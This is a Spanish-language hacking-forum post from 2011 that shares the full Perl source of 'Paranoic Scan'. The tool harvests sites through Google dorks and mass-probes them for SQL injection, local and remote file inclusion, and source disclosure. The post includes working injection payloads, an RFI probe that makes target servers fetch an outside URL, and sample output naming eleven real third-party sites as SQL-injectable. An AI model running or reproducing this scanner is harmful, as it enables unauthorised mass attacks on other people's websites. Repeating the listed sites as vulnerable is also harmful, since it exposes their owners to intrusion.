elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] Paranoic Scan By Doddy H		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] Paranoic Scan By Doddy H  (Leído 1,749 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] Paranoic Scan By Doddy H
« en: 8 Octubre 2011, 16:56 pm »
Hola.

Hoy traigo un programa que eh estado haciendo porque estaba harto de ir probando cada
web que encontraba en google para saber si tenia la vulnerabilidad que queria
Asi que por eso hice esta tool , con las siguientes opciones

* Permite scaner un archivo con webs
* Permite buscar en google , borrar repes , y luego scanear


Tipos de scan :

* SQL
* LFI
* RFI
* FULL SOURCE DISCLOURE



Ejemplo de uso


Código:



@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
 @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
 @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
 @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
 @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
 @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




[a] : Scan a File
[b] : Search in google and scan the webs

[option] : b

[+] Dork : ficha.php+id
[+] Pages : 200


[+] Scan Type :

[S] : SQL
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[A] : All


[Option] : s

[Google] : www.google.com.ar
[Dork] : ficha.php+id
[Pages] : 200

[+] Searching pages..
[+] Cleaning results

[Status] : Scanning
[Webs Count] : 136

[+] SQLI : http://www.3tres3.com/opinion/ficha.php?id=
[+] SQLI : http://www.vincipark.es/ficha.php?id=
[+] SQLI : http://www.maxhuber.cl/ficha.php?id=
[+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id=
[+] SQLI : http://www.bvocal.org/ficha.php?id=
[+] SQLI : http://www.animadas.com/artista-ficha.php?id=
[+] SQLI : http://www.madamedepompadour.cl/ficha.php?id=
[+] SQLI : http://codigo-civil.org/base/ficha.php?id=
[+] SQLI : http://www.cibercolchon.com/ficha.php?id=
[+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID=
[+] SQLI : http://www.nibbledpencil.com/ficha.php?id=

[Status] : Finish



(C) Doddy Hackman 2010


Codigo
Código
  1.  
  2. #!usr/bin/perl
  3. #Paranoic Scan 0.4
  4. #(c)0ded by Doddy H 2010
  5.  
  6. use LWP::UserAgent;
  7. use HTTP::Request::Common;
  8. use URI::Split qw(uri_split);
  9.  
  10. my $nave = LWP::UserAgent->new();
  11. $nave->timeout(5);
  12. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  13.  
  14.  
  15.  
  16.  
  17.  
  18. sub head {
  19. system 'cls';
  21.  
  22.  
  23. @@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
  24.  @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @ 
  25.  @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @ 
  26.  @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @ 
  27.  @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @ 
  28.  @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@ 
  29. @@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @ 
  30.  
  31.  
  32.  
  33.  
  34. );
  35. }
  36. &menu;
  37. sub menu {
  38. &head;
  39. print "[a] : Scan a File\n";
  40. print "[b] : Search in google and scan the webs\n\n";
  41. print "[option] : ";
  42. chomp(my $op = <STDIN>);
  43. if ($op=~/a/ig) {
  44. print "\n[+] Wordlist : ";
  45. chomp(my $word = <STDIN>);
  46. @paginas = repes(savewords($word));
  47. my $option = &men;
  48. scan($option,@paginas);
  49. } 
  50. elsif ($op=~/b/ig) {
  51. print "\n[+] Dork : ";
  52. chomp(my $dork = <STDIN>);
  53. print "[+] Pages : ";
  54. chomp(my $pag = <STDIN>);
  55. my $option = &men;
  56. @paginas = &google("www.google.com.ar",$dork,$pag);
  57. scan($option,@paginas);
  58. }
  59. else {
  60. &menu;
  61. }
  62. }
  63. sub scan {
  64. my ($option,@webs) = @_;
  65. print "\n[Status] : Scanning\n";
  66. print "[Webs Count] : ".int(@webs)."\n\n";
  67. for(@webs) {
  68. if ($option=~/S/ig) {
  69. &sql($_);
  70. } 
  71. if ($option=~/L/ig) {
  72. &lfi($_);
  73. }
  74. if ($option=~/R/ig) {
  75. &rfi($_);
  76. }
  77. if ($option=~/F/ig) {
  78. &fsd($_);
  79. }
  80. if ($option=~/A/ig) {
  81. &sql($_);
  82. &lfi($_);
  83. &rfi($_);
  84. &fsd($_)
  85. }
  86. }
  87. }
  88. print "\n[Status] : Finish\n";
  89. &finish;
  90.  
  91.  
  92. sub toma {
  93. return $nave->request (GET $_[0])->content;
  94. }
  95.  
  96.  
  97. sub savefile {
  98. open (SAVE,">>logs/".$_[0]);
  99. print SAVE $_[1]."\n";
  100. close SAVE; 
  101. }
  102.  
  103. sub finish {
  104. print "\n\n\n(C) Doddy Hackman 2010\n\n";
  105. <STDIN>;
  106. exit(1);
  107. }
  108.  
  109.  
  110. sub google {
  111. print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n";
  112. for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
  113. $response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
  114. while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
  115. push(@founds,$1);
  116. }}
  117. print "[+] Cleaning results\n";
  118. for(@founds) {
  119. $t = clean($_);
  120. push(@r,$t);
  121. } 	
  122. return(repes(@r));
  123. }
  124.  
  125.  
  126. sub sql {
  127. my ($pass1,$pass2) = ("+","--");
  128. my $page = shift;
  129. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  130. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  131. print "[+] SQLI : $page\a\n";
  132. savefile("sql-logs.txt",$page);
  133. }}
  134.  
  135. sub rfi {
  136. my $page = shift;
  137. $code1 = toma($page."http:/www.supertangas.com/");
  138. if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
  139. print "[+] RFI : $page\a\n";
  140. savefile("rfi-logs.txt",$page);
  141. }}
  142.  
  143. sub lfi {
  144. my $page = shift;
  145. $code1 = toma($page."'");
  146. if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
  147. print "[+] LFI : $page\a\n";
  148. savefile("lfi-logs.txt",$page);
  149. }}
  150.  
  151.  
  152. sub fsd {
  153. my $page = shift;
  154. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  155. if ($path=~/\/(.*)$/) { 
  156. my $me = $1;
  157. $code1 = toma($page.$me);
  158. if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
  159. print "[+] Full Source Discloure : $page\a\n";
  160. savefile("fpd-logs.txt",$page);
  161. }}}
  162.  
  163. sub repes {
  164. foreach my $palabra ( @_ ) {
  165. next if $repety{ $palabra }++;
  166. push @revisado,$palabra;
  167. }
  168. return @revisado;
  169. }
  170.  
  171. sub savewords {
  172. open (FILE,$_[0]);
  173. @words = <FILE>;
  174. close FILE;
  175. for(@words) {
  176. $t = clean($_);
  177. push(@r,$t);
  178. } 	
  179. return(@r);
  180. } 
  181.  
  182. sub men {
  183. print "\n\n[+] Scan Type : \n\n";
  184. print "[S] : SQL\n";
  185. print "[L] : LFI\n";
  186. print "[R] : RFI\n";
  187. print "[F] : Full Source Discloure\n";
  188. print "[A] : All\n\n";
  189. print "\n[Option] : ";
  190. chomp(my $option = <STDIN>);
  191. return $option;
  192. }
  193.  
  194. sub clean {
  195. if ($_[0] =~/\=/) {
  196. my @sacar= split("=",$_[0]);
  197. return(@sacar[0]."=");
  198. }
  199. }
  200.  
  201. #The End
  202. #Contact : doddy-hackman[at]hotmail[com]
  203. #blog : doddy-hackman.blogspot.com
« Última modificación: 8 Octubre 2011, 19:11 pm por Doddy » En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] Paranoic Scan 0.9
Scripting 		BigBear 0 1,630 Último mensaje 7 Octubre 2011, 01:15 am
por BigBear
[Perl] Terr0r B0t By Doddy H
Scripting 		BigBear 0 2,279 Último mensaje 7 Octubre 2011, 15:55 pm
por BigBear
[Perl] Stalker By Doddy H
Scripting 		BigBear 2 3,118 Último mensaje 19 Octubre 2011, 22:47 pm
por BigBear
[Perl] Scan Port By Doddy H
Scripting 		BigBear 0 1,966 Último mensaje 7 Octubre 2011, 15:56 pm
por BigBear
[Perl] Pass Cracker By Doddy H
Scripting 		BigBear 0 1,579 Último mensaje 8 Octubre 2011, 16:56 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines